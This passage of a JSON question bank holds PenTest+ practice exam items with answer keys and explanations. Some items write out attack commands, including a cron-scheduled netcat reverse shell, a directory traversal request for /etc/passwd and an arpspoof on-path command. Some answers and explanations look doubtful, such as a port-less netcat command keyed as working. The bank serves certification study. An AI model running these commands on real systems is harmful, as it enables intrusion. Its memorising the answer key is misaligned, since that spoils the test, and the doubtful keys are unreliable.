    "explanation": "Nikto is an automated web application vulnerability scanner that would be perfect for Kaiden\u2019s purposes. Immunity Debugger is a software debugging tool for developers that would not be useful during a web application test. ZAP is a web proxy, and Metasploit is an exploitation framework. Both ZAP and Metasploit may be used during testing, but they are manual tools that do not perform automated scans.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      89,
      229,
      88,
      102,
      119
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 308,
    "question": "Alice encounters a set of security doors set up as shown in the diagram here. What type of physical access attack will she be unable to use due to this design?<br><img src=\"/question_assets/PenTest+/285006_peuf004.png\"/>",
    "choice_a": "Lock picking",
    "choice_b": "RFID card cloning",
    "choice_c": "Tailgating",
    "choice_d": "None of the above",
    "correct_answer": "C",
    "explanation": "Mantraps as shown here prevent tailgating or following an employee through a door. A properly designed mantrap will not allow more than one person in the secured mantrap area at a time, and employees should be trained to not allow others to follow them through the pair of security doors.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      189,
      285,
      193,
      192,
      94
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 309,
    "question": "Allan runs the following <code>find</code> command on a Linux system:<br>find / -perm -4000 <br>The file listing that it returns includes the following files.<br><img src=\"/question_assets/PenTest+/285006_peuf005.png\"/><br>What has Allan listed?",
    "choice_a": "Files with sticky bits set",
    "choice_b": "Encrypted files",
    "choice_c": "SUID files",
    "choice_d": "Hashed files",
    "correct_answer": "C",
    "explanation": "Allan has used the <code>find</code> command to build a list of SUID files on the system he is accessing. It may be possible to leverage these to escalate privileges.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      73,
      10,
      327,
      16,
      54
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 310,
    "question": "Examine the following line of code:<br>puts(\"The system contains several serious vulnerabilities.\")<br>What programming language is it written in?",
    "choice_a": "Python",
    "choice_b": "Bash",
    "choice_c": "PowerShell",
    "choice_d": "Ruby",
    "correct_answer": "D",
    "explanation": "The <code>puts</code> command is used to display output when developing code in Ruby.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      319,
      311,
      308,
      321,
      325
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 311,
    "question": "Maureen is conducting a penetration test and sent the following URL to a web server at the target organization:<br>http://www.targetcompany.com/products/../../../etc/passwd <br>What type of attack is she attempting to execute?",
    "choice_a": "Insecure direct object reference",
    "choice_b": "Directory traversal",
    "choice_c": "Command injection",
    "choice_d": "Parameter pollution",
    "correct_answer": "B",
    "explanation": "The use of the period/backslash notation indicates that Maureen is attempting to navigate through the web server\u2019s filesystem to obtain the <code>/etc/passwd</code> file. This is an example of a directory traversal attack.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      215,
      216,
      11,
      226,
      320
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 312,
    "question": "During a penetration test, Fred conducts network eavesdropping and manages to obtain an HTTP cookie from web traffic. What attack can he wage using this information?",
    "choice_a": "Password cracking",
    "choice_b": "Session hijacking",
    "choice_c": "On-path attack",
    "choice_d": "Pass-the-ticket",
    "correct_answer": "B",
    "explanation": "Session hijacking attacks involve stealing the cookie belonging to a valid user and using it to take over the HTTP session. Cookies would not be useful in password cracking attacks because the password has already been exchanged when the user has a cookie. On-path attacks involve serving as an intermediary in user communication with a server and do not require a valid cookie. Pass-the-ticket attacks exploit vulnerabilities in Kerberos, which is not mentioned in this scenario.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      208,
      11,
      187,
      200,
      226
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 313,
    "question": "During a port scan of a server, Maddox discovered that the following ports are open on the internal network:<br>TCP port 25 <br>TCP port 80 <br>TCP port 110 <br>TCP port 443 <br>TCP port 1433 <br>TCP port 3389 <br>The scan results provide evidence that a variety of services are running on this server. Which one of the following services is <i>not</i> indicated by the scan results?",
    "choice_a": "Web",
    "choice_b": "Database",
    "choice_c": "SSH",
    "choice_d": "RDP",
    "correct_answer": "C",
    "explanation": "Web servers commonly run on ports 80 (HTTP) and 443 (HTTPS). Database servers commonly run on ports 1433 (Microsoft SQL Server), 1521 (Oracle), and 3306 (MySQL). Remote Desktop Protocol (RDP) services commonly run on port 3389. There is no evidence that SSH, which uses TCP port 22, is running on this server.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      173,
      13,
      98,
      112,
      99
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 314,
    "question": "Chuck is creating a new cybersecurity testing application and needs a variable that will contain the domain name of a single system. What data type is appropriate for his needs?",
    "choice_a": "Integer",
    "choice_b": "String",
    "choice_c": "Array",
    "choice_d": "List",
    "correct_answer": "B",
    "explanation": "A domain name is a text value, so it should be stored in a string variable. Integers are numeric data, so that would not be appropriate in this case. Arrays and lists could contain multiple domain names, but they are too complex for Chuck\u2019s needs.",
    "topic_id": 2,
    "practice_test_id": 1,
    "related_articles": [
      313,
      316,
      317,
      315,
      312
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 315,
    "question": "Jason uses Metasploit’s Mimikatz functionality to dump the following hashes from the Windows SAM on a compromised workstation. <br><img src=\"/question_assets/PenTest+/285006_peuf006.png\"/><br>Which of the following tools won’t work to crack the hashes?",
    "choice_a": "John the Ripper",
    "choice_b": "RainbowCrack",
    "choice_c": "hashcat",
    "choice_d": "Mimikatz",
    "correct_answer": "D",
    "explanation": "Although Mimikatz is an excellent tool for obtaining and using hashes, it doesn\u2019t include hash cracking features like John, RainbowCrack, and hashcat.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      243,
      242,
      174,
      172,
      241
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 316,
    "question": "Eric is attempting to gain user credentials by tricking the user into providing a password into a fake form field generated through a cross-site scripting attack. The attack is included in a message posted to an Internet forum. What term can be used to describe this attack?",
    "choice_a": "Reflected XSS",
    "choice_b": "Stored XSS",
    "choice_c": "Consistent XSS",
    "choice_d": "Decentralized XSS",
    "correct_answer": "B",
    "explanation": "Stored (or persistent) cross-site scripting (XSS) attacks use content that is stored in a location where the victim is likely to retrieve it. A message board posting fits into this category. Reflected XSS attacks occur when the script is provided to a web application as input that is immediately displayed as output. Consistent and decentralized are not categories of XSS attacks.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      219,
      198,
      196,
      11,
      226
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 317,
    "question": "Nora claims to be a senior manager in the organization that she is penetration testing and attempts to persuade a staff member to help her access a secured area. What social engineering technique is she using?",
    "choice_a": "Urgency",
    "choice_b": "Fear",
    "choice_c": "Authority",
    "choice_d": "Social proof",
    "correct_answer": "C",
    "explanation": "Nora is leveraging authority to make the staff member feel like they need to help due to her role and importance.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      194,
      198,
      11,
      191,
      207
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 318,
    "question": "Renee is conducting reconnaissance of an organization during a penetration test and discovers URLs in the organization’s web applications that have the following format:<br>https://www.targetorganization.com/referto=www.anothercompany.com <br>What type of exploit would likely be successful against this application?",
    "choice_a": "Unvalidated redirect",
    "choice_b": "Cross-site scripting",
    "choice_c": "Command injection",
    "choice_d": "Insecure direct object reference",
    "correct_answer": "A",
    "explanation": "The presence of another URL (<code>www.anothercompany.com</code>) in the query string indicates that this site may be susceptible to an unvalidated redirect attack. Renee should further test this by attempting to change the URL and determining whether the redirection still takes place.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      209,
      226,
      3,
      11,
      221
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 319,
    "question": "During a penetration test, Eleanor gains access to the <code>/etc/passwd</code> file on a modern Linux machine. What tool can she use to obtain passwords from the file?",
    "choice_a": "Hashcat",
    "choice_b": "Mimikatz",
    "choice_c": "PowerSploit",
    "choice_d": "None of the above",
    "correct_answer": "D",
    "explanation": "Modern Linux systems do not store password hashes in <code>/etc/passwd</code> and instead store them in <code>/etc/shadow</code>. Gaining access to <code>/etc/passwd</code> can be helpful to understand the accounts that a system has provisioned locally and what shells they use, but doing so won\u2019t be useful for actual password recovery in almost all cases.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      242,
      235,
      243,
      174,
      233
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 320,
    "question": "Jessica plugs her laptop into an accessible network jack at her target organization and then changes her MAC address. What security technology is she most likely trying to bypass?",
    "choice_a": "NAC",
    "choice_b": "802.11g",
    "choice_c": "WPA",
    "choice_d": "Port knocking",
    "correct_answer": "A",
    "explanation": "Network Access Control (NAC) systems can use a number of techniques to prevent unknown systems from connecting, but some use MAC address validation as part of their filtering. Of the list of options, the most likely is that Jessica is trying to bypass the organization\u2019s NAC system.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      160,
      159,
      158,
      180,
      157
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 321,
    "question": "Frank is conducting a penetration test and discovers that the client’s website contains a list of usernames and passwords that is publicly exposed on the Internet. How should Frank communicate this to the client?",
    "choice_a": "In the final report",
    "choice_b": "In the executive summary",
    "choice_c": "Immediately",
    "choice_d": "All of the above",
    "correct_answer": "D",
    "explanation": "This is a critical finding and should trigger an immediate communication to the client so that it may be remediated. Frank should also include the finding in the detailed and executive summary sections of the final report, since it is a very significant issue.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      290,
      289,
      296,
      38,
      301
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 322,
    "question": "What information will the following command sequence gather?<br>nc 10.10.11.55 <br>GET / HTTP/3.0",
    "choice_a": "The web server\u2019s banner",
    "choice_b": "The route to the web server",
    "choice_c": "The network category of the web server",
    "choice_d": "This command is not properly formatted and will not work.",
    "correct_answer": "A",
    "explanation": "This command calls Netcat to connect to TCP port 80 on a system with the IP address 10.10.11.55. Presuming this is a web server, the HTTP <code>GET</code> command that follows will fetch the web server\u2019s banner\u2014or at least an error message with useful banner information!",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      67,
      10,
      53,
      62,
      16
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 323,
    "question": "Lucas wants to acquire GPS data from images he discovered on a target website. Which of the following tools is best suited to recovering the metadata he is looking for?",
    "choice_a": "strings",
    "choice_b": "metascan",
    "choice_c": "exiftool",
    "choice_d": "grep",
    "correct_answer": "C",
    "explanation": "Exiftool is a quick and easy tool that can allow Lucas to see the metadata embedded in image files. The strings tool can be used to extract text strings from files, but it\u2019s not as useful for metadata recovery. Grep is a search tool, and metascan was made up for this question.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      16,
      54,
      53,
      327,
      73
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 324,
    "question": "Gary places the following command in the <code>cron.daily</code> file on a Linux system: <br>45 0 2 * * /bin/nc -e /bin/sh 10.10.10.1 1024 <br>What will occur?",
    "choice_a": "Netcat will download a file from 10.10.10.1 every month on the 2nd day of the month.",
    "choice_b": "Netcat will open a reverse shell to 10.10.10.1 from port 1024 every day at 12:45 a.m.",
    "choice_c": "Netcat will open a reverse shell to 10.10.10.1 on port 1024 every month on the 2nd day of the month.",
    "choice_d": "Netcat will grab the banner from 10.10.10.1 every day at 12:45 a.m.",
    "correct_answer": "C",
    "explanation": "This cronjob runs at 12:45 on the 2nd day of every month and opens a reverse shell to 10.10.10.1 on port 1024.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      141,
      151,
      12,
      15,
      122
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 325,
    "question": "Isaac runs Hydra against a target system on port 22. What type of attack is he using, and what service is he most likely using it against?",
    "choice_a": "SQL injection, a web application",
    "choice_b": "SSH injection, an SSH server",
    "choice_c": "FTP brute forcing, a secure FTP server",
    "choice_d": "SSH brute forcing, an SSH server",
    "correct_answer": "D",
    "explanation": "Hydra is a brute-forcing tool, and port 22 is typically associated with SSH. It is most likely that Isaac is attempting to brute-force an SSH server.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      170,
      244,
      174,
      249,
      207
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 326,
    "question": "Robert runs a port scan of a public-facing web server from an external IP address and finds that the only two ports accessible on the server are 443 and 1433. What finding can he report based upon this information?",
    "choice_a": "Unnecessary open services",
    "choice_b": "No multifactor authentication",
    "choice_c": "SQL injection vulnerability",
    "choice_d": "Weak password complexity",
    "correct_answer": "A",
    "explanation": "Port 1433 is used to access a database directly and should never be exposed to the Internet. Therefore, Robert may accurately report the use of unnecessary open services. He is not able to confirm the presence of any of the other issues mentioned in the question without further information.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      295,
      292,
      298,
      296,
      299
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 327,
    "question": "Betsy received a request from her merchant bank for evidence that the organization conducted a penetration test, as required by PCI DSS. What document should Betsy normally provide to the bank as evidence?",
    "choice_a": "Executive summary of the final report",
    "choice_b": "The full final report",
    "choice_c": "Attestation of findings",
    "choice_d": "Methodology section of report",
    "correct_answer": "C",
    "explanation": "The attestation of findings is normally used to communicate a summary of findings from the firm conducting penetration testing to a regulatory body. That would be the appropriate document to share in this case.",
    "topic_id": 1,
    "practice_test_id": 4,
    "related_articles": [
      6,
      296,
      305,
      41,
      38
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 328,
    "question": "Which one of the following is a command shell scripting language that is available on Windows, Mac, and Linux platforms?",
    "choice_a": "Bash",
    "choice_b": "Ruby",
    "choice_c": "Python",
    "choice_d": "PowerShell",
    "correct_answer": "D",
    "explanation": "PowerShell is a command-shell scripting language available for Windows, Linux, and Mac platforms. Bash is also a command-shell scripting language, but it is only available for Linux and Mac systems. Ruby and Python are general-purpose programming languages, not scripting languages.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      308,
      310,
      309,
      311,
      318
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 329,
    "question": "Although monitoring her penetration test traffic, Cynthia notices the following traffic pattern in her Wireshark console: <br><img src=\"/question_assets/PenTest+/285006_peuf007.png\"/><br>What type of attack is occurring?",
    "choice_a": "A TCP handshake attack",
    "choice_b": "A SYN flood",
    "choice_c": "A DDoS",
    "choice_d": "This is not an attack.",
    "correct_answer": "B",
    "explanation": "This Wireshark capture shows a typical SYN flood from a single attack. This would be considered a DoS attack, not a DDoS attack, and if Cynthia is not the one conducting the attack as part of the scope and rules of engagement for her penetration test, she should immediately report it to her emergency contact at the target organization.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      161,
      162,
      286,
      2,
      11
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 330,
    "question": "Harold is conducting a penetration test of a server and runs a vulnerability scan of a web server as he seeks to gain initial access. During this scan, he discovers the vulnerability shown here: <br><img src=\"/question_assets/PenTest+/285006_peuf008.png\"/><br>What operating system is most likely running on the server in this vulnerability scan report?",
    "choice_a": "macOS",
    "choice_b": "Windows",
    "choice_c": "CentOS",
    "choice_d": "RHEL",
    "correct_answer": "B",
    "explanation": "This system is exposing a service on port 3389. This port is typically used for remote administrative access to Windows servers.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      67,
      66,
      65,
      10,
      61
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 331,
    "question": "Harold is conducting a penetration test of a server and runs a vulnerability scan of a web server as he seeks to gain initial access. During this scan, he discovers the vulnerability shown here: <br><img src=\"/question_assets/PenTest+/285006_peuf008.png\"/><br>Harold would like to provide management with advice on correcting this issue. Which one of the following protocols/versions would be an acceptable way to resolve the issue?",
    "choice_a": "SSLv2.0",
    "choice_b": "SSLv3.0",
    "choice_c": "TLSv1.0",
    "choice_d": "None of the above",
    "correct_answer": "D",
    "explanation": "None of the protocols and versions listed in this question are an acceptable way to correct this vulnerability. All versions of SSL contain critical vulnerabilities and should no longer be used. TLSv1.0 also contains a vulnerability that would allow an attacker to downgrade the cryptography used by the server. Harold should upgrade the server to support at least TLSv1.2.",
    "topic_id": 1,
    "practice_test_id": 4,
    "related_articles": [
      298,
      295,
      296,
      6,
      305
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 332,
    "question": "Greg is preparing to travel to Iran for a penetration testing engagement. What potential issue may impact the tools that he can travel with on his penetration testing laptop?",
    "choice_a": "Export restrictions",
    "choice_b": "Corporate policies",
    "choice_c": "Import restrictions",
    "choice_d": "XSD portability issues",
    "correct_answer": "A",
    "explanation": "In the United States and other countries, some technologies are covered by export restrictions, prohibiting them from being exported to specific countries. In this case, Iran is a country that is typically on the short list of countries that have export restrictions for many technologies.",
    "topic_id": 1,
    "practice_test_id": 1,
    "related_articles": [
      39,
      37,
      38,
      18,
      36
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 333,
    "question": "Martin places a call to an administrative assistant at his target organization and pretends to be an angry peer of the administrative assistant’s manager. He explains that there was a major problem and that if the administrative assistant does not help, the manager and the administrative assistant will be in major trouble and may be fired. What social engineering motivation technique is he using?",
    "choice_a": "Fear",
    "choice_b": "Reciprocation",
    "choice_c": "Urgency",
    "choice_d": "Authority",
    "correct_answer": "A",
    "explanation": "Although this scenario has elements of a number of techniques, threats that a target may suffer damage target fear first. Martin has to be careful, since fear responses can be dangerous to work with and responses can be unpredictable.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      11,
      194,
      207,
      195,
      3
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 334,
    "question": "Robert gained access to a system during a penetration test and would like to create a list of all user accounts on that system. What type of technique should he use? ",
    "choice_a": "Configuration analysis",
    "choice_b": "Remote access",
    "choice_c": "IP address modification",
    "choice_d": "Enumeration",
    "correct_answer": "D",
    "explanation": "Enumeration techniques allow an attacker to list all the valid accounts, domain names, systems, or other resources on a system.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      10,
      67,
      64,
      327,
      73
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 335,
    "question": "Brian is writing up the report of a penetration test and would like to recommend the use of multifactor authentication to complement the existing password authentication on a system. He would like to use biometric authentication. Which one of the following approaches would best meet his needs?",
    "choice_a": "Smartcards",
    "choice_b": "Security tokens",
    "choice_c": "Fingerprint scans",
    "choice_d": "Security questions",
    "correct_answer": "C",
    "explanation": "Fingerprint scans are a measure of an individual\u2019s physical body and, therefore, fit the definition of biometric authentication. Passwords and security questions are examples of knowledge-based authentication. Smartcards and security tokens are examples of possession-based authentication.",
    "topic_id": 1,
    "practice_test_id": 6,
    "related_articles": [
      294,
      298,
      296,
      293,
      305
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 336,
    "question": "Angela’s organization has reviewed and signed a contract that includes the terms for future work done by a penetration testing vendor. Each engagement will have a distinct statement of work under the overall terms that this contract provides. What type of contract has Angela’s organization signed?",
    "choice_a": "An MDA",
    "choice_b": "A work/practice order",
    "choice_c": "An MSA",
    "choice_d": "A binding arbitration agreement",
    "correct_answer": "C",
    "explanation": "Angela\u2019s organization has signed a master service agreement (MSA). Master service agreements are often used when organizations intend to engage in repeated business, allowing contractual terms to be negotiated once and specific work engagements to be covered by a statement of work (SOW) for each engagement. Of the remaining answers, only a binding arbitration agreement is a commonly used legal term, and it describes a method used to resolve legal disputes using a mediator.",
    "topic_id": 1,
    "practice_test_id": 3,
    "related_articles": [
      31,
      37,
      36,
      26,
      17
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 337,
    "question": "As part of her assessment of a target location, Samantha checks for useful information in the trash. What is this technique called?",
    "choice_a": "Trashing",
    "choice_b": "Dumpster diving",
    "choice_c": "Can checking",
    "choice_d": "Recycle bin hopping",
    "correct_answer": "B",
    "explanation": "Dumpster diving involves going through an organization\u2019s trash to recover useful information. Anything that an organization throws away may be useful, from directories to memos and business documents.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      192,
      189,
      199,
      288,
      285
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 338,
    "question": "Which section of a penetration testing report is most likely to contain information needed to pinpoint and remediate security issues?",
    "choice_a": "Executive summary",
    "choice_b": "Findings",
    "choice_c": "Methodology",
    "choice_d": "Conclusions",
    "correct_answer": "B",
    "explanation": "The findings section of a penetration testing report should include technical details on the issues identified as well as suggested remediations designed to resolve the issues.",
    "topic_id": 1,
    "practice_test_id": 5,
    "related_articles": [
      296,
      298,
      297,
      299,
      302
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 339,
    "question": "Matt wants to conduct a DLL hijacking attack on a Window system. He wants to take advantage of the default search order for the Windows system. Which of the following locations will be searched first for the DLL?",
    "choice_a": "The Windows directory",
    "choice_b": "The directories listed in the PATH",
    "choice_c": "The Windows system directory",
    "choice_d": "The directory the application is in",
    "correct_answer": "D",
    "explanation": "The Windows search order is the directory the application is in, the current directory, the Windows system directory, the Windows directory, and then any directories listed in the <code>PATH</code> variable.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      234,
      235,
      11,
      252,
      251
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 340,
    "question": "What is CeWL used for during a penetration test?",
    "choice_a": "Password cracking",
    "choice_b": "Code analysis",
    "choice_c": "Wordlist creation",
    "choice_d": "A disassembler",
    "correct_answer": "C",
    "explanation": "CeWL stands for Custom Word List generator, and it is used to spider a site and build a list of words, which can be fed to a password cracker as part of a custom dictionary.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      16,
      10,
      70,
      328,
      327
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 341,
    "question": "Matt spends lunchtime at his target organization sitting with an employee who is talking about how difficult his relationship with his manager is, and how far behind on his work he is. Matt tells the target employee that he has the same types of challenges with his own boss and asks the target employee for help in the form of actions required for his penetration test. What type of social engineering motivation technique has Matt used?",
    "choice_a": "Reciprocation",
    "choice_b": "Likeness",
    "choice_c": "Social proof",
    "choice_d": "Authority",
    "correct_answer": "B",
    "explanation": "Matt spent his time building a perceived relationship, and then leveraged that likeness, or similarity, to ask the employee to help him. Sympathy and trust can be a powerful tool for a penetration tester, especially if you are good at reading people or at listening.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      194,
      11,
      207,
      195,
      3
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 342,
    "question": "Charles uses the following command as part of his attack:<br>arpspoof -i eth0 -t 10.10.1.100 -r 10.1.1.1 <br>What type of attack is he most likely conducting?",
    "choice_a": "A DoS attack",
    "choice_b": "A VLAN hopping attack",
    "choice_c": "An on-path attack",
    "choice_d": "A DHCP spoofing attack",
    "correct_answer": "C",
    "explanation": "Charles is using the <code>arpspoof</code> command to hijack traffic destined for another system, thus allowing him to conduct an on-path attack.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      159,
      187,
      188,
      11,
      3
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 343,
    "question": "Mary executes the attack shown here: <br>.<img src=\"/question_assets/PenTest+/285006_peuf009.png\"/><br>What will happen next?",
    "choice_a": "The client will reconnect directly to the web server, bypassing the on-path attacker.",
    "choice_b": "The client will send a new ClientHello with a lower TLS version.",
    "choice_c": "The client will send a new ClientHello with a higher TLS version.",
    "choice_d": "Nothing; the communication has ended after the FIN.",
    "correct_answer": "B",
    "explanation": "This is an example of an SSL downgrade attack, and Mary is attempting to cause the client to reconnect with a less secure TLS version. The client will attempt to reconnect by sending a new ClientHello with a lower TLS version if it is supported.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      226,
      11,
      200,
      331,
      219
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 344,
    "question": "Olivia runs the following command on a Windows system:<br>Set-Item wsman:\\localhost\\client\\trustedhosts 10.45.11.22 <br>What has she enabled?",
    "choice_a": "She has opened the Windows firewall to allow 10.45.11.22 in.",
    "choice_b": "She has enabled remote PowerShell access from 10.45.11.22.",
    "choice_c": "She has allowed all web browsing to 10.45.11.22.",
    "choice_d": "None of the above.",
    "correct_answer": "B",
    "explanation": "If she restarts the Windows remote management service after executing her command, Olivia will have remote PowerShell access to the system she ran this command on. Once that is enabled, she has use PowerShell for a multitude of exploits\u2014all from her remote system!",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      252,
      310,
      330,
      254,
      329
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 345,
    "question": "The facility that Phil is targeting has doors that open automatically when staff approach them from inside. What technique can Phil use to exploit these egress sensors?",
    "choice_a": "Pick the locks that they control.",
    "choice_b": "Short circuit the external control panel.",
    "choice_c": "Slide something between the doors and shake it to trip the sensor.",
    "choice_d": "Call an employee over so that the doors open.",
    "correct_answer": "C",
    "explanation": "Although it may seem like an overly simple answer, egress sensors can be tripped by simply sliding something between or under the doors that will be detected by the sensors on the inside of the door. A thin rod or stick with paper on it, or even a helium balloon that is inflated under the door, can be used against egress sensors.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      189,
      193,
      278,
      107,
      75
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 346,
    "question": "In what type of exploit does the attacker leverage a position on a guest operating system to gain access to hardware resources assigned to other operating systems running in the same hardware environment?",
    "choice_a": "Buffer overflow",
    "choice_b": "Directory traversal",
    "choice_c": "VM escape",
    "choice_d": "Cross-site scripting",
    "correct_answer": "C",
    "explanation": "In a VM escape attack, the attacker exploits vulnerabilities in the hypervisor to gain access to resources assigned to other guest operating systems. Services running on the guest may be vulnerable to the other attacks listed here, but those attacks would only be able to access other resources assigned to either the same guest (in the case of buffer overflow or directory traversal) or the client (in the case of cross-site scripting).",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      259,
      257,
      11,
      217,
      269
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 347,
    "question": "As part of a penetration test, Sarah prepares a WordPress exploit to compromise a vulnerable system. Once she gains access to the web server service, she uses a local privilege escalation exploit to become root on the system and then leverages a third exploit to capture encryption keys from live system memory. What type of technique is she using?",
    "choice_a": "Linked exploits",
    "choice_b": "Exploit chaining",
    "choice_c": "Web to root escalation",
    "choice_d": "ASLR exploitation",
    "correct_answer": "B",
    "explanation": "The use of a series of exploits to gain access to systems or information is known as exploit chaining. Exploit chaining is often required to achieve a penetration tester\u2019s end goal, so you should always keep in mind that even low-value targets or services may provide opportunities to gain further access.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      163,
      156,
      218,
      234,
      329
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 348,
    "question": "Which one of the following actions is not normally conducted during the post-engagement cleanup phase of the penetration test?",
    "choice_a": "Removing shells",
    "choice_b": "Sanitizing documents",
    "choice_c": "Deleting accounts",
    "choice_d": "Removing tools",
    "correct_answer": "B",
    "explanation": "Documents created during the test should be preserved as evidence of a successful test and retained according to the organization\u2019s document retention policy. The post-engagement cleanup phase should include removing any shells, tools, or user accounts created or installed by the penetration testers.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      306,
      154,
      122,
      150,
      12
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 349,
    "question": "Annie runs an nmap scan using the <code>-T</code> flag set as <code>-T0</code>. Why is she most likely to do that, and what issue may she encounter?",
    "choice_a": "She is only scanning TCP ports and may miss services running on UDP ports.",
    "choice_b": "She is attempting to avoid IDS systems, and her scan may be very slow.",
    "choice_c": "She is attempting to use a TCP timeout scan and may not receive data due to delayed packets.",
    "choice_d": "The <code>T</code> flag is not a valid nmap flag, and her scan will error out.",
    "correct_answer": "B",
    "explanation": "The timing settings for nmap determine how quickly scan traffic is sent. <code>-T0</code> sends a probe every 5 minutes, whereas <code>-T1</code> sends one every 15 seconds. Both will be very slow for most reasonably sized networks\u2014scanning even the 1,000 default TCP ports a default nmap TCP scan covers will take three and a half days for a single host!",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      65,
      53,
      61,
      16,
      62
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 350,
    "question": "Scott wants to redirect traffic that will go to <code>www.pentest-example.com</code> to a system he controls. How can he easily accomplish this if he has administrative access to the local system?",
    "choice_a": "Change the system\u2019s IP address.",
    "choice_b": "Change the system\u2019s host file.",
    "choice_c": "Modify the target\u2019s host file.",
    "choice_d": "Modify the target\u2019s ARP table.",
    "correct_answer": "B",
    "explanation": "Adding an entry to the local hosts file is an easy way to redirect traffic to a system of your choice, and Scott can do this with the administrative access he has acquired.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      254,
      218,
      213,
      157,
      239
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 351,
    "question": "The Delivery phase of the Cyber Kill Chain occurs during which phase of a penetration test?",
    "choice_a": "Planning and scoping",
    "choice_b": "Information gathering and vulnerability identification",
    "choice_c": "Attacking and exploiting",
    "choice_d": "Reporting and communicating results",
    "correct_answer": "C",
    "explanation": "The Reconnaissance phase of the Cyber Kill Chain maps to the information gathering and vulnerability identification phase of a penetration test. All of the other phases of the Cyber Kill Chain, including Delivery, map to the attacking and exploiting phase of a penetration test.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      14,
      46,
      297,
      296,
      26
    ],
    "source": "285006_Practice Exam"
  }
];
